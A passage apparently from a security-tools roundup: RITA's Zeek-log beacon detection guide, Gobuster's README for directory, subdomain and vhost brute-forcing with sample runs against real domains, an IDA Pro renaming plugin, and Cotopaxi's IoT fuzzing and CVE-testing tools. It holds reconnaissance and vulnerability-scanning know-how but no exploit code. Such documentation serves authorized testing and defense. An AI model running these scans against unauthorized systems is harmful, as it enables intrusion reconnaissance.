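            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
addr = ipaddress.ip_address("192.168.1.1")
print(any(addr in net for net in internal))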

Obtaining Data (Generating Bro/Zeek Logs):
  • Option 1: Generate PCAPs outside of Bro/Zeek
    • Generate PCAP files with a packet sniffer (tcpdump, wireshark, etc.)
    • (Optional) Merge multiple PCAP files into one PCAP file
      • mergecap -w outFile.pcap inFile1.pcap inFile2.pcap
    • Generate Bro/Zeek logs from the PCAP files
      • bro -r pcap_to_log.pcap local "Log::default_rotation_interval = 1 day"
  • Option 2: Install Bro/Zeek and let it monitor an interface directly [instructions]
    • You may wish to compile Bro/Zeek from source for performance reasons. This script can help automate the process.
    • The automated installer for RITA installs pre-compiled Bro/Zeek binaries by default
      • Provide the --disable-bro flag when running the installer if you intend to compile Bro/Zeek from source

Importing and Analyzing Data With RITA
After installing RITA, setting up the InternalSubnets section of the config file, and collecting some Bro/Zeek logs, you are ready to begin hunting.
Filtering and whitelisting happens at import time. These optional settings can be found alongside InternalSubnets in the configuration file.
RITA will process Bro/Zeek TSV logs in both plaintext and gzip compressed formats. Note, if you are using Security Onion or Bro's JSON log output you will need to switch back to traditional TSV output.
  • Option 1: Create a One-Off Dataset
    • rita import path/to/your/bro_logs dataset_name creates a dataset from a collection of Bro/Zeek logs in a directory
    • Every log file directly in the supplied directory will be imported into a dataset with the given name
    • If you import more data into the same dataset, RITA will automatically convert it into a rolling dataset.
  • Option 2: Create a Rolling Dataset
    • Rolling datasets allow you to progressively analyze log data over a period of time as it comes in.
    • You can call rita like this: rita import --rolling /path/to/your/bro_logs and make this call repeatedly as new logs are generated (e.g. every hour)
    • RITA cycles data into and out of rolling databases in "chunks". You can think of each chunk as one hour, and the default being 24 chunks in a dataset. This gives the ability to always have the most recent 24 hours' worth of data available. But chunks are generic enough to accommodate non-default Bro logging configurations or data retention times as well.

Rolling Datasets
Please see the above section for the simplest use case of rolling datasets. This section covers the various options you can customize and more complicated use cases.
Each rolling dataset has a total number of chunks it can hold before it rotates data out. For instance, if the dataset currently contains 24 chunks of data and is set to hold a max of 24 chunks, then the next chunk to be imported will automatically remove the first chunk before bringing the new data in. This will result in a database that still contains 24 chunks. If each chunk contains an hour of data, your dataset will have 24 hours of data in it. You can specify the number of chunks manually with --numchunks when creating a rolling database, but if this is omitted RITA will use the Rolling: DefaultChunks value from the config file.
Likewise, when importing a new chunk you can specify the chunk number you wish to replace in the dataset with --chunk. If you leave this off, RITA will auto-increment the chunk for you. The chunk number must be between 0 (inclusive) and the total number of chunks (exclusive); you will get an error if you try to use a chunk number greater than or equal to the total number of chunks.
All files and folders that you give RITA to import will be imported into a single chunk. This could be 1 hour, 2 hours, 10 hours, 24 hours, or more. RITA doesn't care how much data is in each chunk so even though it's normal for each chunk to represent the same amount of time, each chunk could have a different number of hours of logs. This means that you can run RITA on a regular interval without worrying if systems were offline for a little while or the data was delayed. You might get a little more or less data than you intended but as time passes and new data is added it will slowly correct itself.
Example: If you wanted to have a dataset with a week's worth of data you could run the following rita command once per day.
rita import --rolling --numchunks 7 /opt/bro/logs/current week-dataset
This would import a day's worth of data into each chunk and you'd get a week's worth in total. After the first 7 days were imported, the dataset would rotate out old data to keep the most recent 7 days' worth of data. Note that you'd have to make sure new logs were being added to /opt/bro/logs/current in this example.
Example: If you wanted to have a dataset with 48 hours of data you could run the following rita command every hour.
rita import --rolling --numchunks 48 /opt/bro/logs/current 48-hour-dataset
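The hourly import can be driven by cron or by a small wrapper. A sketch of the wrapper approach, reusing the dataset name and log path from the example above:

# Re-run the 48-hour rolling import once per hour; the dataset name and
# log path are taken from the example above and may need adjusting.
import subprocess
import time

CMD = ["rita", "import", "--rolling", "--numchunks", "48",
       "/opt/bro/logs/current", "48-hour-dataset"]

while True:
    subprocess.run(CMD, check=False)
    time.sleep(3600)  # one hour between imports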

Examining Data With RITA
  • Use the show-X commands
    • show-databases: Print the datasets currently stored
    • show-beacons: Print hosts which show signs of C2 software
    • show-bl-hostnames: Print blacklisted hostnames which received connections
    • show-bl-source-ips: Print blacklisted IPs which initiated connections
    • show-bl-dest-ips: Print blacklisted IPs which received connections
    • show-exploded-dns: Print dns analysis. Exposes covert dns channels
    • show-long-connections: Print long connections and relevant information
    • show-strobes: Print connections which occurred with excessive frequency
    • show-useragents: Print user agent information
  • By default RITA displays data in CSV format
    • -H displays the data in a human readable format
    • Piping the human readable results through less -S prevents word wrapping
      • Ex: rita show-beacons dataset_name -H | less -S
  • Create a html report with html-report



Gobuster v3.0 - Directory/File, DNS And VHost Busting Tool Written In Go

Gobuster is a tool used to brute-force:
  • URIs (directories and files) in web sites.
  • DNS subdomains (with wildcard support).
  • Virtual Host names on target web servers.

Oh dear God.. WHY!?
Because I wanted:
  1. ... something that didn't have a fat Java GUI (console FTW).
  2. ... to build something that just worked on the command line.
  3. ... something that did not do recursive brute force.
  4. ... something that allowed me to brute force folders and multiple extensions at once.
  5. ... something that compiled to native on multiple platforms.
  6. ... something that was faster than an interpreted script (such as Python).
  7. ... something that didn't require a runtime.
  8. ... use something that was good with concurrency (hence Go).
  9. ... to build something in Go that wasn't totally useless.

But it's shit! And your implementation sucks!
Yes, you're probably correct. Feel free to:
  • Not use it.
  • Show me how to do it better.

Love this tool? Back it!
If you're backing us already, you rock. If you're not, that's cool too! Want to back us? Become a backer!

All funds that are donated to this project will be donated to charity. A full log of charity donations will be available in this repository as they are processed.

Changes in 3.0
  • New CLI options so modes are strictly separated (-m is now gone!)
  • Performance Optimizations and better connection handling
  • Ability to bruteforce vhost names
  • Option to supply custom HTTP headers

Available Modes
  • dir - the classic directory brute-forcing mode
  • dns - DNS subdomain brute-forcing mode
  • vhost - virtual host brute-forcing mode (not the same as DNS!)

Built-in Help
Help is built-in!
  • gobuster help - outputs the top-level help.
  • gobuster help <mode> - outputs the help specific to that mode.

dns Mode Help
Usage:
  gobuster dns [flags]

Flags:
  -d, --domain string      The target domain
  -h, --help               help for dns
  -r, --resolver string    Use custom DNS server (format server.com or server.com:port)
  -c, --showcname          Show CNAME records (cannot be used with '-i' option)
  -i, --showips            Show IP addresses
      --timeout duration   DNS resolver timeout (default 1s)
      --wildcard           Force continued operation when wildcard found

Global Flags:
  -z, --noprogress        Don't display progress
  -o, --output string     Output file to write results to (defaults to stdout)
  -q, --quiet             Don't print the banner and other noise
  -t, --threads int       Number of concurrent threads (default 10)
      --delay duration    Time each thread waits between requests (e.g. 1500ms)
  -v, --verbose           Verbose output (errors)
  -w, --wordlist string   Path to the wordlist

dir Mode Options
Usage:
  gobuster dir [flags]

Flags:
  -f, --addslash                      Append / to each request
  -c, --cookies string                Cookies to use for the requests
  -e, --expanded                      Expanded mode, print full URLs
  -x, --extensions string             File extension(s) to search for
  -r, --followredirect                Follow redirects
  -H, --headers stringArray           Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
  -h, --help                          help for dir
  -l, --includelength                 Include the length of the body in the output
  -k, --insecuressl                   Skip SSL certificate verification
  -n, --nostatus                      Don't print status codes
  -P, --password string               Password for Basic Auth
  -p, --proxy string                  Proxy to use for requests [http(s)://host:port]
  -s, --statuscodes string            Positive status codes (will be overwritten with statuscodesblacklist if set) (default "200,204,301,302,307,401,403")
  -b, --statuscodesblacklist string   Negative status codes (will override statuscodes if set)
      --timeout duration              HTTP Timeout (default 10s)
  -u, --url string                    The target URL
  -a, --useragent string              Set the User-Agent string (default "gobuster/3.0.1")
  -U, --username string               Username for Basic Auth
      --wildcard                      Force continued operation when wildcard found

Global Flags:
  -z, --noprogress        Don't display progress
  -o, --output string     Output file to write results to (defaults to stdout)
  -q, --quiet             Don't print the banner and other noise
  -t, --threads int       Number of concurrent threads (default 10)
      --delay duration    Time each thread waits between requests (e.g. 1500ms)
  -v, --verbose           Verbose output (errors)
  -w, --wordlist string   Path to the wordlist

vhost Mode Options
Usage:
  gobuster vhost [flags]

Flags:
  -c, --cookies string        Cookies to use for the requests
  -r, --followredirect        Follow redirects
  -H, --headers stringArray   Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
  -h, --help                  help for vhost
  -k, --insecuressl           Skip SSL certificate verification
  -P, --password string       Password for Basic Auth
  -p, --proxy string          Proxy to use for requests [http(s)://host:port]
      --timeout duration      HTTP Timeout (default 10s)
  -u, --url string            The target URL
  -a, --useragent string      Set the User-Agent string (default "gobuster/3.0.1")
  -U, --username string       Username for Basic Auth

Global Flags:
  -z, --noprogress        Don't display progress
  -o, --output string     Output file to write results to (defaults to stdout)
  -q, --quiet             Don't print the banner and other noise
  -t, --threads int       Number of concurrent threads (default 10)
      --delay duration    Time each thread waits between requests (e.g. 1500ms)
  -v, --verbose           Verbose output (errors)
  -w, --wordlist string   Path to the wordlist

Easy Installation

Binary Releases
We are now shipping binaries for each of the releases so that you don't even have to build them yourself! How wonderful is that!
If you're stupid enough to trust binaries that I've put together, you can download them from the releases page.

Using go get
If you have a Go environment ready to go, it's as easy as:
go get github.com/OJ/gobuster

Building From Source
Since this tool is written in Go you need to install the Go language/compiler/etc. Full details of installation and set up can be found on the Go language website. Once installed you have two options.

Compiling
gobuster now has external dependencies, and so they need to be pulled in first:
go get && go build
This will create a gobuster binary for you. If you want to install it in the $GOPATH/bin folder you can run:
go install
If you have all the dependencies already, you can make use of the build scripts:
  • make - builds for the current Go configuration (ie. runs go build).
  • make windows - builds 32 and 64 bit binaries for windows, and writes them to the build subfolder.
  • make linux - builds 32 and 64 bit binaries for linux, and writes them to the build subfolder.
  • make darwin - builds 32 and 64 bit binaries for darwin, and writes them to the build subfolder.
  • make all - builds for all platforms and architectures, and writes the resulting binaries to the build subfolder.
  • make clean - clears out the build subfolder.
  • make test - runs the tests.

Wordlists via STDIN
Wordlists can be piped into gobuster via stdin by providing a - to the -w option:
hashcat -a 3 --stdout ?l | gobuster dir -u https://mysite.com -w -
Note: If the -w option is specified at the same time as piping from STDIN, an error will be shown and the program will terminate.
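A generated wordlist can also be piped in from a script rather than a shell pipeline. A minimal Python sketch (the target URL and the generated words are placeholders):

# Feed a generated wordlist into gobuster via stdin (-w -);
# the target URL and the generated words are placeholders.
import subprocess

words = ("admin%02d" % i for i in range(100))

proc = subprocess.Popen(
    ["gobuster", "dir", "-u", "https://example.com", "-w", "-"],
    stdin=subprocess.PIPE, text=True)
proc.communicate("\n".join(words))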

Examples

dir Mode
Command line might look like this:
gobuster dir -u https://mysite.com/path/to/folder -c 'session=123456' -t 50 -w common-files.txt -x .php,.html
Default options looks like this:
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dir
[+] Url/Domain : https://buffered.io/
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/shortlist.txt
[+] Status codes : 200,204,301,302,307,401,403
[+] User Agent : gobuster/3.0.1
[+] Timeout : 10s
===============================================================
2019/06/21 11:49:43 Starting gobuster
===============================================================
/categories (Status: 301)
/contact (Status: 301)
/posts (Status: 301)
/index (Status: 200)
===============================================================
2019/06/21 11:49:44 Finished
===============================================================
Default options with status codes disabled looks like this:
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -n

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dir
[+] Url/Domain : https://buffered.io/
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/shortlist.txt
[+] Status codes : 200,204,301,302,307,401,403
[+] User Agent : gobuster/3.0.1
[+] No status : true
[+] Timeout : 10s
===============================================================
2019/06/21 11:50:18 Starting gobuster
===============================================================
/categories
/contact
/index
/posts
===============================================================
2019/06/21 11:50:18 Finished
===============================================================

Verbose output looks like this:
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -v

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dir
[+] Url/Domain : https://buffered.io/
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/shortlist.txt
[+] Status codes : 200,204,301,302,307,401,403
[+] User Agent : gobuster/3.0.1
[+] Verbose : true
[+] Timeout : 10s
===============================================================
2019/06/21 11:50:51 Starting gobuster
===============================================================
Missed: /alsodoesnotexist (Status: 404)
Found: /index (Status: 200)
Missed: /doesnotexist (Status: 404)
Found: /categories (Status: 301)
Found: /posts (Status: 301)
Found: /contact (Status: 301)
===============================================================
2019/06/21 11:50:51 Finished
===============================================================
Example showing content length:
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -l

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dir
[+] Url/Domain : https://buffered.io/
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/shortlist.txt
[+] Status codes : 200,204,301,302,307,401,403
[+] User Agent : gobuster/3.0.1
[+] Show length : true
[+] Timeout : 10s
===============================================================
2019/06/21 11:51:16 Starting gobuster
===============================================================
/categories (Status: 301) [Size: 178]
/posts (Status: 301) [Size: 178]
/contact (Status: 301) [Size: 178]
/index (Status: 200) [Size: 51759]
===============================================================
2019/06/21 11:51:17 Finished
===============================================================
Quiet output, with status disabled and expanded mode looks like this ("grep mode"):
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt -q -n -e
https://buffered.io/index
https://buffered.io/contact
https://buffered.io/posts
https://buffered.io/categories

dns Mode
Command line might look like this:
gobuster dns -d mysite.com -t 50 -w common-names.txt
Normal sample run goes like this:
gobuster dns -d google.com -w ~/wordlists/subdomains.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dns
[+] Url/Domain : google.com
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/subdomains.txt
===============================================================
2019/06/21 11:54:20 Starting gobuster
===============================================================
Found: chrome.google.com
Found: ns1.google.com
Found: admin.google.com
Found: www.google.com
Found: m.google.com
Found: support.google.com
Found: translate.google.com
Found: cse.google.com
Found: news.google.com
Found: music.google.com
Found: mail.google.com
Found: store.google.com
Found: mobile.google.com
Found: search.google.com
Found: wap.google.com
Found: directory.google.com
Found: local.google.com
Found: blog.google.com
===============================================================
2019/06/21 11:54:20 Finished
===============================================================
Show IP sample run goes like this:
gobuster dns -d google.com -w ~/wordlists/subdomains.txt -i

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dns
[+] Url/Domain : google.com
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/subdomains.txt
===============================================================
2019/06/21 11:54:54 Starting gobuster
===============================================================
Found: www.google.com [172.217.25.36, 2404:6800:4006:802::2004]
Found: admin.google.com [172.217.25.46, 2404:6800:4006:806::200e]
Found: store.google.com [172.217.167.78, 2404:6800:4006:802::200e]
Found: mobile.google.com [172.217.25.43, 2404:6800:4006:802::200b]
Found: ns1.google.com [216.239.32.10, 2001:4860:4802:32::a]
Found: m.google.com [172.217.25.43, 2404:6800:4006:802::200b]
Found: cse.google.com [172.217.25.46, 2404:6800:4006:80a::200e]
Found: chrome.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: search.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: local.google.com [172.217.25.46, 2404:6800:4006:80a::200e]
Found: news.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: blog.google.com [216.58.199.73, 2404:6800:4006:806::2009]
Found: support.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: wap.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: directory.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: translate.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: music.google.com [172.217.25.46, 2404:6800:4006:802::200e]
Found: mail.google.com [172.217.25.37, 2404:6800:4006:802::2005]
===============================================================
2019/06/21 11:54:55 Finished
===============================================================

A base domain validation warning is shown when the base domain fails to resolve. This is a warning rather than a failure, in case the user fat-fingers while typing the domain:
gobuster dns -d yp.to -w ~/wordlists/subdomains.txt -i

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dns
[+] Url/Domain : yp.to
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/subdomains.txt
===============================================================
2019/06/21 11:56:43 Starting gobuster
===============================================================
2019/06/21 11:56:53 [-] Unable to validate base domain: yp.to
Found: cr.yp.to [131.193.32.108, 131.193.32.109]
===============================================================
2019/06/21 11:56:53 Finished
===============================================================
Wildcard DNS is also detected properly:
gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Mode : dns
[+] Url/Domain : 0.0.1.xip.io
[+] Threads : 10
[+] Wordlist : /home/oj/wordlists/subdomains.txt
===============================================================
2019/06/21 12:13:48 Starting gobuster
===============================================================
2019/06/21 12:13:48 [-] Wildcard DNS found. IP address(es): 1.0.0.0
2019/06/21 12:13:48 [!] To force processing of Wildcard DNS, specify the '--wildcard' switch.
===============================================================
2019/06/21 12:13:48 Finished
===============================================================
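If the user wants to force processing of a domain that has wildcard entries, the output above suggests adding the --wildcard switch; a sketch of such a run (command only) would be:
gobuster dns -d 0.0.1.xip.io -w ~/wordlists/subdomains.txt --wildcard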


Auto Re - IDA PRO Auto-Renaming Plugin With Tagging Support

IDA PRO Auto-Renaming Plugin With Tagging Support

Features

1. Auto-renaming dummy-named functions that contain a single API call or a jump to an imported API (see the sketch at the end of this section)

Before


After



2. Assigning TAGS to functions according to the API-call indicators found inside
  • Sets tags as repeatable function comments and displays the TAG tree in a separate view
Some screenshots of TAGS view:





How TAGs look in unexplored code:


You can easily rename a function using its context menu or by pressing the n hotkey:


Installation
Just copy auto_re.py to the IDA\plugins directory and it will be available through the Edit -> Plugins -> Auto RE menu.
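To illustrate the renaming idea from feature 1, here is a minimal IDAPython sketch (not the plugin's actual code), under the assumption that a dummy-named sub_ function referencing exactly one named, non-dummy target should be renamed after that target:

# Illustrative IDAPython sketch, not auto_re's implementation.
import idautils
import idc

def referenced_names(func_ea):
    """Collect names of call/jump targets inside the function at func_ea."""
    names = set()
    for head in idautils.FuncItems(func_ea):
        for ref in idautils.CodeRefsFrom(head, False):  # non-flow refs: calls and jumps
            name = idc.get_name(ref)
            if name and not name.startswith(("sub_", "loc_")):
                names.add(name)
    return names

for func_ea in idautils.Functions():
    if not idc.get_func_name(func_ea).startswith("sub_"):
        continue  # only touch dummy-named functions
    targets = referenced_names(func_ea)
    if len(targets) == 1:
        api = targets.pop()
        # the "au_" prefix is arbitrary here; it avoids clashing with the imported symbol
        idc.set_name(func_ea, "au_" + api, idc.SN_NOWARN)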


Cotopaxi - Set Of Tools For Security Testing Of Internet Of Things Devices Using Specific Network IoT Protocols


Set of tools for security testing of Internet of Things devices using protocols like: CoAP, DTLS, HTCPCP, mDNS, MQTT, SSDP.

Installation:
Simply clone the code from git: https://github.com/Samsung/cotopaxi
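For example:
git clone https://github.com/Samsung/cotopaxi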

Requirements:
Currently Cotopaxi works only with Python 2.7.x, but future versions will also work with Python 3.
If you have a previous installation of scapy without scapy-ssl_tls, remove it or use a venv.
Installation of main libraries:
  1. scapy-ssl_tls (this will also install scapy in version 2.4.2)
    pip install git+https://github.com/tintinweb/scapy-ssl_tls@ec5714d560c63ea2e0cce713cec54edc2bfa0833
Common problems:
  • If you encounter error: [Errno 2] No such file or directory: 'LICENSE', try repeating the command - surprisingly, it works.
  • If you encounter error: NameError: name 'os' is not defined, add the missing import os to scapy/layers/ssl_tls.py.
All other required packages can be installed using requirements.txt file:
    pip install -r cotopaxi/requirements.txt
Manual installation of other required packages:
    pip install dnslib IPy hexdump pyyaml psutil enum34 configparser

Disclaimer
Cotopaxi toolkit is intended to be used only for authorized security testing!
Some tools (especially the vulnerability tester and protocol fuzzer) can cause some devices or servers to stop acting in the intended way, for example crashing or hanging the tested entities, or flooding other entities with network traffic.
Make sure you have permission from the owners of tested devices or servers before running these tools!
Make sure you check with your local laws before running these tools!

Tools in this package:
  • service_ping
  • server_fingerprinter
  • resource_listing
  • protocol_fuzzer (for fuzzing servers)
  • client_proto_fuzzer (for fuzzing clients)
  • vulnerability_tester (for testing servers)
  • client_vuln_tester (for testing clients)
  • amplifier_detector
Protocols supported by different tools:
Tool                  CoAP  DTLS  HTCPCP  mDNS  MQTT  SSDP
service_ping          yes   yes   yes     yes   yes   yes
server_fingerprinter  yes   yes   -       -     -     -
resource_listing      yes   -     -       yes   -     yes
protocol_fuzzer       yes   yes   yes     yes   yes   yes
client_proto_fuzzer   yes   yes   yes     yes   yes   yes
vulnerability_tester  yes   yes   yes     yes   yes   yes
client_vuln_tester    yes   yes   yes     yes   yes   yes
amplifier_detector    yes   yes   -       yes   -     yes

cotopaxi.service_ping
Tool for checking the availability of a network service at given IP and port ranges
usage: sudo python -m cotopaxi.service_ping [-h] [-v] [--protocol {UDP,TCP,CoAP,MQTT,DTLS,ALL}]
[--src-port SRC_PORT]
dest_ip dest_port

positional arguments:
dest_ip destination IP address or multiple IPs separated by
coma (e.g. '1.1.1.1,2.2.2.2') or given by CIDR netmask
(e.g. '10.0.0.0/22') or both
dest_port destination port or multiple ports given by list
separated by coma (e.g. '8080,9090') or port range
(e.g. '1000-2000') or both

optional arguments:
-h, --help show this help message and exit
--retries RETRIES, -R RETRIES
number of retries
--timeout TIMEOUT, -T TIMEOUT
timeout in seconds
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--protocol {UDP,TCP,CoAP,mDNS,SSDP,MQTT,DTLS,ALL,HTCPCP}, -P {UDP,TCP,CoAP,mDNS,SSDP,MQTT,DTLS,ALL,HTCPCP}
protocol to be tested (UDP includes CoAP, DTLS, mDNS,
and SSDP, TCP includes CoAP, HTCPCP, and MQTT, ALL
includes all supported protocols)
--src-port SRC_PORT, -SP SRC_PORT
source port (if not specified random port will be
used)
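For example, a hypothetical run checking whether a CoAP service is listening on a single device (IP and port are placeholders):
sudo python -m cotopaxi.service_ping 192.168.0.20 5683 -P CoAP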

cotopaxi.server_fingerprinter
Tool for software fingerprinting of network servers at given IP and port ranges
Currently supported servers:
  • CoAP:
    • aiocoap,
    • CoAPthon,
    • FreeCoAP,
    • libcoap,
    • MicroCoAP,
    • Mongoose
    • Wakaama (formerly liblwm2m)
  • DTLS:
    • GnuTLS,
    • Goldy,
    • LibreSSL,
    • MatrixSSL,
    • mbed TLS,
    • OpenSSL,
    • TinyDTLS
usage: sudo python -m cotopaxi.server_fingerprinter [-h] [--retries RETRIES] [--timeout TIMEOUT]
[--verbose]
[--protocol {CoAP,DTLS}]
[--src-port SRC_PORT]
dest_ip dest_port

positional arguments:
dest_ip destination IP address or multiple IPs separated by
coma (e.g. '1.1.1.1,2.2.2.2') or given by CIDR netmask
(e.g. '10.0.0.0/22') or both
dest_port destination port or multiple ports given by list
separated by coma (e.g. '8080,9090') or port range
(e.g. '1000-2000') or both

optional arguments:
-h, --help show this help message and exit
--retries RETRIES, -R RETRIES
number of retries
--timeout TIMEOUT, -T TIMEOUT
timeout in seconds
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--protocol {CoAP,DTLS}, -P {CoAP,DTLS}
protocol to be tested
--src-port SRC_PORT, -SP SRC_PORT
source port (if not specified random port will be
used)
--ignore-ping-check, -Pn
ignore ping check (treat all ports as alive)
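For example, a hypothetical fingerprinting run against a single CoAP endpoint (IP and port are placeholders):
sudo python -m cotopaxi.server_fingerprinter 192.168.0.20 5683 -P CoAP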

cotopaxi.resource_listing
Tool for checking the availability of resources (given as URL paths in a file) on servers at given IP and port ranges. Sample URL lists are available in the urls directory.
usage: sudo python -m cotopaxi.resource_listing [-h] [-v] [--protocol {CoAP,ALL}]
[--method {GET,POST,PUT,DELETE,ALL}]
[--src-port SRC_PORT]
dest_ip dest_port url_filepath

positional arguments:
dest_ip destination IP address or multiple IPs separated by
coma (e.g. '1.1.1.1,2.2.2.2') or given by CIDR netmask
(e.g. '10.0.0.0/22') or both
dest_port destination port or multiple ports given by list
separated by coma (e.g. '8080,9090') or port range
(e.g. '1000-2000') or both
url_filepath path to file with list of URLs to be tested (each URL
in separated line)

optional arguments:
-h, --help show this help message and exit
--retries RETRIES, -R RETRIES
number of retries
--timeout TIMEOUT, -T TIMEOUT
timeout in seconds
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--protocol {CoAP,mDNS,SSDP}, -P {CoAP,mDNS,SSDP}
protocol to be tested
--method {GET,POST,PUT,DELETE,ALL}, -M {GET,POST,PUT,DELETE,ALL}
methods to be tested (ALL includes all supported
methods)
--src-port SRC_PORT, -SP SRC_PORT
source port (if not specified random port will be
used)
--ignore-ping-check, -Pn
ignore ping check (treat all ports as alive)
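For example, a hypothetical run probing a list of CoAP resources (IP, port, and URL-list path are placeholders):
sudo python -m cotopaxi.resource_listing 192.168.0.20 5683 urls/my_url_list.txt -P CoAP -M GET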

cotopaxi.protocol_fuzzer
Black-box fuzzer for testing protocol servers
usage: sudo python -m cotopaxi.protocol_fuzzer 
[-h] [--retries RETRIES] [--timeout TIMEOUT]
[--verbose] [--protocol {CoAP,mDNS,MQTT,DTLS}]
[--src-ip SRC_IP] [--src-port SRC_PORT]
[--ignore-ping-check] [--corpus-dir CORPUS_DIR]
dest_ip dest_port

positional arguments:
dest_ip destination IP address or multiple IPs separated by
coma (e.g. '1.1.1.1,2.2.2.2') or given by CIDR netmask
(e.g. '10.0.0.0/22') or both
dest_port destination port or multiple ports given by list
separated by coma (e.g. '8080,9090') or port range
(e.g. '1000-2000') or both

optional arguments:
-h, --help show this help message and exit
--retries RETRIES, -R RETRIES
number of retries
--timeout TIMEOUT, -T TIMEOUT
timeout in seconds
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--protocol {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}, -P {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}
protocol to be tested
--hide-disclaimer, -HD
hides legal disclaimer (shown before starting
intrusive tools)
--src-ip SRC_IP, -SI SRC_IP
source IP address (return result will not be
received!)
--src-port SRC_PORT, -SP SRC_PORT
source port (if not specified random port will be
used)
--ignore-ping-check, -Pn
ignore ping check (treat all ports as alive)
--corpus-dir CORPUS_DIR, -C CORPUS_DIR
path to directory with fuzzing payloads (corpus) (each
payload in separated file)
--delay-after-crash DELAY_AFTER_CRASH, -DAC DELAY_AFTER_CRASH
number of seconds that fuzzer will wait after crash
for respawning tested server
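For example, a hypothetical fuzzing run against a CoAP server using a local corpus directory (IP, port, and corpus path are placeholders):
sudo python -m cotopaxi.protocol_fuzzer 192.168.0.20 5683 -P CoAP -C my_coap_corpus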

cotopaxi.client_proto_fuzzer
Black-box fuzzer for testing protocol clients
usage: sudo client_proto_fuzzer.py [-h] [--server-ip SERVER_IP]
[--server-port SERVER_PORT]
[--protocol {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}]
[--verbose] [--corpus-dir CORPUS_DIR]

optional arguments:
-h, --help show this help message and exit
--server-ip SERVER_IP, -SI SERVER_IP
IP address, that will be used to set up tester server
--server-port SERVER_PORT, -SP SERVER_PORT
port that will be used to set up server
--protocol {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}, -P {CoAP,mDNS,MQTT,DTLS,SSDP,HTCPCP}
protocol to be tested
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--corpus-dir CORPUS_DIR, -C CORPUS_DIR
path to directory with fuzzing payloads (corpus) (each
payload in separated file)
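For example, a hypothetical run that starts a fuzzing server for CoAP clients to connect to (IP, port, and corpus path are placeholders; module-style invocation is assumed here, as with the other tools):
sudo python -m cotopaxi.client_proto_fuzzer -SI 192.168.0.2 -SP 5683 -P CoAP -C my_coap_corpus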

cotopaxi.vulnerability_tester
Tool for checking vulnerabilities of network services at given IP and port ranges
usage: sudo python -m cotopaxi.vulnerability_tester [-h] [-v]
[--cve {ALL,CVE-2018-19417,...}]
[--list LIST] [--src-port SRC_PORT]
dest_ip dest_port

positional arguments:
dest_ip destination IP address or multiple IPs separated by
coma (e.g. '1.1.1.1,2.2.2.2') or given by CIDR netmask
(e.g. '10.0.0.0/22') or both
dest_port destination port or multiple ports given by list
separated by coma (e.g. '8080,9090') or port range
(e.g. '1000-2000') or both

optional arguments:
-h, --help show this help message and exit
--retries RETRIES, -R RETRIES
number of retries
--timeout TIMEOUT, -T TIMEOUT
timeout in seconds
--protocol {UDP,TCP,CoAP,mDNS,MQTT,DTLS,ALL}, -P {UDP,TCP,CoAP,mDNS,MQTT,DTLS,ALL}
protocol to be tested (UDP includes CoAP, mDNS and
DTLS, TCP includes CoAP and MQTT, ALL includes all
supported protocols)
--hide-disclaimer, -HD
hides legal disclaimer (shown before starting
intrusive tools)
--verbose, -V, --debug, -D
Turn on verbose/debug mode (more messages)
--cve {ALL,CVE-2018-19417,...}
list of vulnerabilities to be tested (by CVE id)
--vuln {ALL,BOTAN_000,COAPTHON3_000,...}
list of vulnerabilities to be tested (by SOFT_NUM id)

--list, -L display lists of all vulnerabilities supported by this
tool with detailed description
--src-port SRC_PORT, -SP SRC_PORT
source port (if not specified random port will be
used)
--ignore-ping-check, -Pn
ignore ping check (treat all ports as alive)
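For example, a hypothetical run testing all known CoAP vulnerabilities against a single server (IP and port are placeholders):
sudo python -m cotopaxi.vulnerability_tester 192.168.0.20 5683 -P CoAP --cve ALL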

cotopaxi.client_vuln_tester
Tool for checking the vulnerability of network clients that connect to a test server provided by this tool
